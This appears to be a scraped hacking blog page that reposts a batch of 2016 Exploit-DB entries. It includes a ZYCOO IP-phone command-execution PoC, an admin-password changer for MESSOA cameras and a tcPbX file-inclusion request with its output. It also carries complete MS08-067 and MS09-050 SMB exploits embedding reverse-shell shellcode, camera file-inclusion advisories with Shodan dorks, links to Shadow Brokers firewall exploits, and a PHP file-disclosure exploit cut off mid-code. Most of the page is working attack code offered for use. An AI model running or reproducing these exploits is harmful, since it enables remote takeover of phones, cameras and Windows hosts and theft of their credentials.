Vulnerable hardware : ZYCOO IP phone system
Vendor : zycoo.com
Author : Ahmed sultan (@0x4148)
Email : 0x4148@gmail.com
Summary : According to the vendor's site ,
CooVox Series IP Phone System is the most innovative solution for VoIP telecommunication in SMB (Small and Medium-sized Business) market.
They provide not only traditional PBX functions such as automated attendant and voicemail,
but also offer many advance telephony features, including remote extensions, remote office connection,
IVR, call recording, call detail records(CDR)…
Vulnerable file : /www/cgi-bin/system_cmd.cgi
Code shot :
#!/bin/hush
printf '\r\n'
if [ -n "$REQUEST_METHOD" ]; then
case "$REQUEST_METHOD" in
(GET)
if [ -n "$QUERY_STRING" ]; then
for args in `echo "$QUERY_STRING" | tr "&" " "`
do
param=`echo "$args" | cut -d "=" -f 1`
value=`echo "$args" | cut -d "=" -f 2`
eval "export $param=$value"
done
fi
;;
esac
fi
INI_FILE=/etc/asterisk/manager.conf
INI_SECTION=$username
eval `sed -e 's/[[:space:]]*\=[[:space:]]*/=/g' \
-e 's/;.*$//' \
-e 's/[[:space:]]*$//' \
-e 's/^[[:space:]]*//' \
-e "s/^\(.*\)=\([^\"']*\)$/\1=\'\2\'/" \
< $INI_FILE \
| sed -n -e "/^\[$INI_SECTION\]/,/^\s*\[/{/^[^;].*\=.*/p;}"`
password="`/etc/scripts/decodeURI $password`"
[ -z "$secret" ] && secret=`/etc/scripts/getkeyvalue.sh ${INI_SECTION} vmsecret`
if [ "$password" = "$secret" ]; then
cmd=`echo $cmd | sed 's/%20/ /g'`
# cmd=`echo $cmd | sed -e's/%\([0-9A-F][0-9A-F]\)/\\\\\x\1/g;s/?r//g' | xargs echo`
$cmd
the GET parameter cmd is freely available to directly execute system commands with no prior required authentication
which lead to full hardware takeover
POC
[0x4148:/R1z]# curl http://server:9999/cgi-bin/system_cmd.cgi\?cmd\='cat%20/etc/passwd'
root:$1$C6ouMLFa$pb2/Bu1bcWpBNcX38jTva0:0:0:root:/:/bin/sh
nobody:x:99:99:Nobody::
Also by reading file /etc/asterisk/manager.conf
hardware admin's password can be obtained in plain text
Fixing?
Unfortunately the hardware frontend really depend on this file , and the vendor is super lazy on replying on the emails regarding this vulnerability
so , best fixation for now is enabling the web interface browsing from the local network only
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863532377
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WatchGuard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: http://www.watchguard.com/
Full Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40270.zip
# Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: http://www.cisco.com/
Full Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40271.zip
# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: http://www.topsec.com.cn/
Full Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40272.zip
# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: http://www.topsec.com.cn/
Full Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40273.zip
# Exploit Title: TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: http://www.topsec.com.cn/
Full Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40274.zip
# Exploit Title: TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: http://www.topsec.com.cn/
Full Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40275.zip
# Exploit Title: Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)
# Date: 19-08-2016
# Exploit Author: Shadow Brokers
# Vendor Homepage: https://www.fortinet.com/products/fortigate/
Full Exploit:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40276.zip
#
#
# Multiple MESSOA IP-Cameras auth bypass admin user/password changer
#
# Tested:
# MESSOA NIC 835 Release: X.2.1.8
# MESSOA NIC 835-HN5 Release: X.2.1.17
# MESSOA NIC 836 Release: X.2.1.7
# MESSOA NDZ 860 Release: X.3.0.6.1
# MESSOA
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " [ MESSOA IP-Cameras auth bypass admin user/password changer"
echo " [ ==="
echo " [ Usage: $0 <target> <user> <password>"
echo " [ Example: $0 192.168.1.200:80 hacker teflon"
echo " [ ==="
echo " [ Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " [ Website: http://www.ethical-hacker.org/"
echo " [ Facebook: https://www.facebook.com/ethicalhackerorg "
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " [ Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/cgi-bin/writefile.cgi?DEFonoff_adm=&Adm_ID=$2&Adm_Pass1=$3&Adm_Pass2=$3&UpSectionName=ADMINID" 0&> /dev/null <&1
Vulnerable hardware : tcpbx voip distro
Vendor : www.tcpbx.org
Author : Ahmed sultan (@0x4148)
Email : 0x4148@gmail.com
Summary : According to the vendor's site ,
tcPbX is a complete and functional VoIP phone system based on Asterisk open
source software and CentOS operating system.
The simplified installation and the new administration portal allow you to
have a full featured phone system in less than an hour without specific
skills on linux or asterisk
Vulnerable file : /var/www/html/tcpbx/index.php
The software suffer from LFI flaw because of the tcpbx_lang parameter isn't
sanitized before being proceeded in the file
Request
GET /tcpbx/ HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;
PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1
Connection: close
Cache-Control: max-age=0
-----------------------------------
Response
HTTP/1.1 200 OK
Date: Fri, 19 Aug 2016 15:45:30 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23874
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
import struct
import time
import sys
from threading import Thread #Thread is imported incase you would like to modify
try:
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit'
print '# This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).'
print '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi'
print '#######################################################################\n'
#Reverse TCP shellcode from metasploit; port 443 IP 192.168.40.103; badchars \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40;
#Make sure there are enough nops at the begining for the decoder to work. Payload size: 380 bytes (nopsleps are not included)
#EXITFUNC=thread Important!
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode+="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x2b\xc9\x83\xe9\xa7\xe8\xff\xff\xff\xff\xc0\x5e\x81"
shellcode += "\x76\x0e\xb7\xdd\x9e\xe0\x83\xee\xfc\xe2\xf4\x4b\x35"
shellcode += "\x1c\xe0\xb7\xdd\xfe\x69\x52\xec\x5e\x84\x3c\x8d\xae"
shellcode += "\x6b\xe5\xd1\x15\xb2\xa3\x56\xec\xc8\xb8\x6a\xd4\xc6"
shellcode += "\x86\x22\x32\xdc\xd6\xa1\x9c\xcc\x97\x1c\x51\xed\xb6"
shellcode += "\x1a\x7c\x12\xe5\x8a\x15\xb2\xa7\x56\xd4\xdc\x3c\x91"
shellcode += "\x8f\x98\x54\x95\x9f\x31\xe6\x56\xc7\xc0\xb6\x0e\x15"
shellcode += "\xa9\xaf\x3e\xa4\xa9\x3c\xe9\x15\xe1\x61\xec\x61\x4c"
shellcode += "\x76\x12\x93\xe1\x70\xe5\x7e\x95\x41\xde\xe3\x18\x8c"
shellcode += "\xa0\xba\x95\x53\x85\x15\xb8\x93\xdc\x4d\x86\x3c\xd1"
shellcode += "\xd5\x6b\xef\xc1\x9f\x33\x3c\xd9\x15\xe1\x67\x54\xda"
shellcode += "\xc4\x93\x86\xc5\x81\xee\x87\xcf\x1f\x57\x82\xc1\xba"
shellcode += "\x3c\xcf\x75\x6d\xea\xb5\xad\xd2\xb7\xdd\xf6\x97\xc4"
shellcode += "\xef\xc1\xb4\xdf\x91\xe9\xc6\xb0\x22\x4b\x58\x27\xdc"
shellcode += "\x9e\xe0\x9e\x19\xca\xb0\xdf\xf4\x1e\x8b\xb7\x22\x4b"
shellcode += "\x8a\xb2\xb5\x5e\x48\xa9\x90\xf6\xe2\xb7\xdc\x25\x69"
shellcode += "\x51\x8d\xce\xb0\xe7\x9d\xce\xa0\xe7\xb5\x74\xef\x68"
shellcode += "\x3d\x61\x35\x20\xb7\x8e\xb6\xe0\xb5\x07\x45\xc3\xbc"
shellcode += "\x61\x35\x32\x1d\xea\xea\x48\x93\x96\x95\x5b\x35\xff"
shellcode += "\xe0\xb7\xdd\xf4\xe0\xdd\xd9\xc8\xb7\xdf\xdf\x47\x28"
shellcode += "\xe8\x22\x4b\x63\x4f\xdd\xe0\xd6\x3c\xeb\xf4\xa0\xdf"
shellcode += "\xdd\x8e\xe0\xb7\x8b\xf4\xe0\xdf\x85\x3a\xb3\x52\x22"
shellcode += "\x4b\x73\xe4\xb7\x9e\xb6\xe4\x8a\xf6\xe2\x6e\x15\xc1"
shellcode += "\x1f\x62\x5e\x66\xe0\xca\xff\xc6\x88\xb7\x9d\x9e\xe0"
shellcode += "\xdd\xdd\xce\x88\xbc\xf2\x91\xd0\x48\x08\xc9\x88\xc2"
shellcode += "\xb3\xd3\x81\x48\x08\xc0\xbe\x48\xd1\xba\x09\xc6\x22"
shellcode += "\x61\x1f\xb6\x1e\xb7\x26\xc2\x1a\x5d\x5b\x57\xc0\xb4"
shellcode += "\xea\xdf\x7b\x0b\x5d\x2a\x22\x4b\xdc\xb1\xa1\x94\x60"
shellcode += "\x4c\x3d\xeb\xe5\x0c\x9a\x8d\x92\xd8\xb7\x9e\xb3\x48"
shellcode += "\x08\x9e\xe0"
nonxjmper = "\x08\x04\x02\x00%s"+"A"*4+"%s"+"A"*42+"\x90"*8+"\xeb\x62"+"A"*10
disableNXjumper = "\x08\x04\x02\x00%s%s%s"+"A"*28+"%s"+"\xeb\x02"+"\x90"*2+"\xeb\x62"
ropjumper = "\x00\x08\x01\x00"+"%s"+"\x10\x01\x04\x01";
module_base = 0x6f880000
def generate_rop(rvas):
gadget1="\x90\x5a\x59\xc3"
gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"]
gadget3="\xcc\x90\xeb\x5a"
ret=struct.pack('<L', 0x00018000)
ret+=struct.pack('<L', rvas['call_HeapCreate']+module_base)
ret+=struct.pack('<L', 0x01040110)
ret+=struct.pack('<L', 0x01010101)
ret+=struct.pack('<L', 0x01010101)
ret+=struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret']+module_base)
ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
ret+=gadget1
ret+=struct.pack('<L', rvas['mov [eax], ecx / ret']+module_base)
ret+=struct.pack('<L', rvas['jmp eax']+module_base)
ret+=gadget2[0]
ret+=gadget2[1]
ret+=struct.pack('<L', rvas['mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret']+module_base)
ret+=struct.pack('<L', rvas['pop ecx / ret']+module_base)
ret+=gadget2[2]
ret+=struct.pack('<L', rvas['mov [eax+0x10], ecx / ret']+module_base)
ret+=struct.pack('<L', rvas['add eax, 8 / ret']+module_base)
ret+=struct.pack('<L', rvas['jmp eax']+module_base)
ret+=gadget3
return ret
class SRVSVC_Exploit(Thread):
def __init__(self, target, os, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.os = os
def __DCEPacket(self):
if (self.os=='1'):
print 'Windows XP SP0/SP1 Universal\n'
ret = "\x61\x13\x00\x01"
jumper = nonxjmper % (ret, ret)
elif (self.os=='2'):
print 'Windows 2000 Universal\n'
ret = "\xb0\x1c\x1f\x00"
jumper = nonxjmper % (ret, ret)
elif (self.os=='3'):
print 'Windows 2003 SP0 Universal\n'
ret = "\x9e\x12\x00\x01" #0x01 00 12 9e
jumper = nonxjmper % (ret, ret)
elif (self.os=='4'):
print 'Windows 2003 SP1 English\n'
ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL
ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL
jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL
disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL
jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2)
elif (self.os=='5'):
print 'Windows XP SP3 French (NX)\n'
ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07
disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='6'):
print 'Windows XP SP3 English (NX)\n'
ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07
disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2
jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case.
elif (self.os=='7'):
print 'Windows XP SP3 English (AlwaysOn NX)\n'
rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64}
jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case.
else:
print 'Not supported OS version\n'
sys.exit(-1)
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2
server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00"
prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00"
self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00"
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
time.sleep(5)
print 'Exploit finish\n'
if __name__ == '__main__':
try:
target = sys.argv[1]
os = sys.argv[2]
except IndexError:
print '\nUsage: %s <target ip>\n' % sys.argv[0]
print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
sys.exit(-1)
current = SRVSVC_Exploit(target, os)
current.start()
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
#!/usr/bin/python
#This module depends on the linux command line program smbclient.
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection
try:
target = sys.argv[1]
except IndexError:
print '\nUsage: %s <target ip>\n' % sys.argv[0]
print 'Example: MS36299.py 192.168.1.1 1\n'
sys.exit(-1)
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python
shell = ""
shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" #fce8820000006089e531c0648b
shell += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell += "\xff\xd5\x6a\x05\x68\xc0\xa8\x1e\x4d\x68\x02\x00\x01"
shell += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
shell += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
shell += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
shell += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
shell += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
shell += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
shell += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
shell += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
shell += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
shell += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
shell += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0"
shell += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
shell += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
shell += "\x53\xff\xd5"
host = target, 445
buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42"
buff+="\x72\x00\x00\x00\x00\x18\x53\xc8"
buff+="\x17\x02" #high process ID
buff+="\x00\xe9\x58\x01\x00\x00"
buff+="\x00\x00\x00\x00\x00\x00\x00\x00"
buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02"
buff+="\x04\x0d\xdf\xff"*25
buff+="\x00\x02\x53\x4d"
buff+="\x42\x20\x32\x2e\x30\x30\x32\x00"
buff+="\x00\x00\x00\x00"*37
buff+="\xff\xff\xff\xff"*2
buff+="\x42\x42\x42\x42"*7
buff+="\xb4\xff\xff\x3f" #magic index
buff+="\x41\x41\x41\x41"*6
buff+="\x09\x0d\xd0\xff" #return address
#stager_sysenter_hook from metasploit
buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d"
buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9"
buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4"
buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a"
buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00"
buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24"
buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10"
buff+="\x68\x76\x01\x00\x00\x59\x89\xd8"
buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31"
buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb"
buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d"
buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00"
buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10"
buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0"
buff+="\x83\xc2\x04\x81\x22\xff\xff\xff"
buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff"
buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f"
buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18"
buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10"
buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08"
buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73"
buff+="\x73\x75\x15\xe8\x07\x00\x00\x00"
buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9"
buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34"
buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff"
buff+=shell
s = socket()
s.connect(host)
s.send(buff)
s.close()
#Trigger the above injected code via authenticated process.
subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)
1. Advisory Information
========================================
Title : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Local File Inclusion
Vendor Homepage : https://is.spiap.com/
Remotely Exploitable : Yes
Tested on Camera types : CCPW3025-IR , CVMW3025-IR
Product References : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html
+ : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html
Vulnerability : Local File Inclusion (Critical/High)
Shodan Dork : title:"Vanderbilt IP-Camera"
Date : 20/08/2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
========================================
Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations.
4. Proof-of-Concept:
========================================
For example you can get /etc/passwd
http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd
http://host:port/cgi-bin/chklogin.cgi?file=../../../etc/passwd
Or config.ini file:
http://host:port/cgi-bin/check.cgi?file=config.ini
http://host:port/cgi-bin/chklogin.cgi?file=config.ini
5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
1. Advisory Information
========================================
Title : JVC IP-Camera (VN-T216VPRU) Local File Inclusion
Vendor Homepage : http://pro.jvc.com/
Remotely Exploitable : Yes
Tested on Camera types : VN-T216VPRU
Product References : http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL102145
Vulnerability : Local File Inclusion (Critical/High)
Date : 20/08/2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
========================================
JVC IP-Camera (VN-T216VPRU) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations.
4. Proof-of-Concept:
========================================
For example you can get /etc/passwd
http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd
Or config.ini file:
http://host:port/cgi-bin/check.cgi?file=config.ini
5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
1. Advisory Information
========================================
Title : Honeywell IP-Camera (HICC-1100PT) Local File Inclusion
Vendor Homepage : https://www.asia.security.honeywell.com
Remotely Exploitable : Yes
Tested on Camera types : HICC-1100PT
Reference : https://www.asia.security.honeywell.com/Pages/product.aspx?category=720P-1.3M%20Box%20Camera&cat=HSG-ASIASECURITY&pid=HICC-1100T
Vulnerability : Local File Inclusion (Critical/High)
Shodan Dork : html:"Honeywell IP-Camera"
Date : 20/08/2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
========================================
Honeywell IP-Camera (HICC-1100PT) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations.
4. Proof-of-Concept:
========================================
For example you can get /etc/passwd
http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd
Or config.ini file:
http://host:port/cgi-bin/check.cgi?file=config.ini
5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
<?php
# VideoIQ Camera Remote File Disclosure 0day Exploit
#
# VideoIQ develops intelligent video surveillance cameras using edge video IP security cameras paired with video analytics.
#
# Exploit Coded & Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# Date 20/08/2016
# Shodan Dork : title:"VideoIQ Camera Login"
# Version Affected : All Versions
# Vendor Homepage : http://avigilon.com
# CVE : N/A
# Description : VideoIQ is vulnerable to remote file disclosure which allows to any unauthenticated user read any file system including file configurations.
###
# Exploit code:
error_reporting(0);
$error[0] = "[!] This script is intended to be launched from the cli.";
if(php_sapi_name() <> "cli")
die($error[0]);
if($argc < 3) {
echo("\nUsage : php {$argv[0]} <host> <port>");
echo("\nExample: php {$argv[0]} localhost 8080");
die();
}
if(isset($argv[1]) && isset($argv[2])) {
$host = $argv[1];
$port = $argv[2];
}
$pack = "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{FILE_PATH} HTTP/1.0\r\n";
